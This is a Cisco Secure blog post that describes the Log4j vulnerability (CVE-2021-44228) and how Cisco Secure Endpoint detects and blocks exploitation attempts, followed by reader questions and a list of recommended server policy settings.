The Apache Log4j vulnerability (CVE-2021-44228) is on the mind of nearly every cybersecurity and IT team right now because of its widespread usage, ease of exploitation, and broad attack surface. This blog provides an overview of how Cisco Secure Endpoint helps protect your environment from attackers exploiting this vulnerability.
What You Need to Know About Log4j
On Thursday, December 9, the Apache Software Foundation disclosed a security vulnerability in Apache Log4j, a Java-based logging library widely used by developers around the world. This library is also often used by commercial and open-source tools such as Apache Struts 2, Apache Solr, Apache Fink, Apache Druid, Apache Kafka, Elasticsearch, and more.
This vulnerability allows attackers to remotely execute malicious code on affected servers, enabling them to gain full control of these servers. Widely believed to be easy to exploit, this vulnerability has received the maximum CVSS severity score of 10.0 and a 93/100 score from Kenna Security, Cisco’s risk-based vulnerability management solution.
How Cisco Secure Endpoint Helps
Cisco Secure Endpoint rapidly identifies and protects against Log4j exploits in multiple ways. It blocks threats that try to exploit the Log4j vulnerability with multifaceted prevention techniques, including machine learning and behavioral protection. Furthermore, robust detection and response capabilities reduce dwell time. Finally, rich threat intelligence from the Cisco Talos security research team allows you to have the latest protection from attackers.
In case any threats get through, advanced Endpoint Detection and Response (EDR) functionality such as SecureX Threat Hunting and Orbital Advanced Search quickly uncovers signs of Log4j exploitation attempts and post-exploitation activity such as lateral movement, suspicious command launch and others. This includes two new Orbital queries that identify entities affected by the Log4j vulnerability on Windows and Linux devices (windows_log4j_monitoring and linux_log4j_monitoring). To learn how to use these queries to detect Log4j attacks, please see the below video.
In addition, with extended detection and response (XDR) capabilities from the built-in Cisco SecureX platform, you get a more complete view into the threat landscape for the Log4j exploit. This enables you to automate response actions to isolate and quarantine compromised endpoints – reducing the time it takes to detect and remediate a threat that leverages the Log4j vulnerability. Finally, cloud Indicators of Compromise (IOCs) in Secure Endpoint have been updated to include new Log4j-related detections and new clamAV signatures are available to block attacks exploiting Log4j.
For more information on the Cisco response to Log4j, including how other Cisco Secure solutions can protect you from this vulnerability, please see the Cisco Talos Threat Advisory page and the Cisco Event Response page for Log4j. To learn more about Secure Endpoint, please visit our product page.
We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!
Cisco Secure Social Channels
What settings in AMP / Secure Endpoint must be configured to protect from log4j?
If Following Cisco Policy recommendations, will this protect servers from log4j exploits?
Cisco Recommended Settings for Servers:
Malicious Activity Protection: Disabled
System Process Protection: Disabled
Script Protection: Quarantine
Exploit Prevention: Audit
Exploit Prevention – Script Control: Audit
Behavioral Protection: Protect
Comments are closed.